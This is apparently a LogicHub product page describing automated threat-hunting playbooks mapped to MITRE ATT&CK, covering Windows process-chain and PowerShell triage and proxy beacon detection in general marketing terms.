LogicHub is continuously developing new threat detection and threat hunting content which is categorized and mapped to the MITRE ATT&CK framework, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations and maintained by the MITRE Corporation.
Windows Process Creation Monitoring
After an adversary has compromised a system in your network, they will move laterally—that is, they will explore the network to discover what systems and services you have in place, and search for more vulnerabilities and assets to steal or compromise. As part of this lateral movement, they will run processes on Windows endpoints, and these processes will be logged in Windows process creation logs. Millions of these logs are likely already being generated and collected. However, the truly suspicious and malicious events can easily be missed in the noise of normal activity.
LogicHub has refined and automated hundreds of threat hunting detection patterns and techniques and mapped them to the MITRE ATT&CK framework. Some major capabilities in this pre-built playbook include:
- Process Chain Monitoring: tracks process execution logs to identify “process chains” to track the sequence of process executions, then uses a machine learning algorithm to compare against known good and known bad behavior (including “Living Off the Land Binaries” [aka “LOLBins”]: built-in Windows commands that are often used by attackers and malicious code) to predict whether a particular chain is likely to be malicious.
- Automated Powershell Command Triage: De-obfuscates and analyzes powershell commands, factoring in hundreds of patterns and a machine learning classifier trained on your organizations data.
The Windows Process Creation Events playbook can separate truly suspicious and malicious events as an experienced threat hunting team would, but backed by automated analysis. The playbook shortcuts the need for months of detection content development and tuning by automatically tuning out most noise present in the deployed environment.
Proxy Beacon Detection
One of the many use cases that LogicHub customers have implemented and benefited from is that of automating threat hunting in web proxy logs.
Automated threat hunting of proxy logs with LogicHub is a powerful and easy start to your threat hunting campaigns by focusing on a smaller subset of important events. LogicHub is capable of reducing the noise by identifying a smaller subset of riskier entries.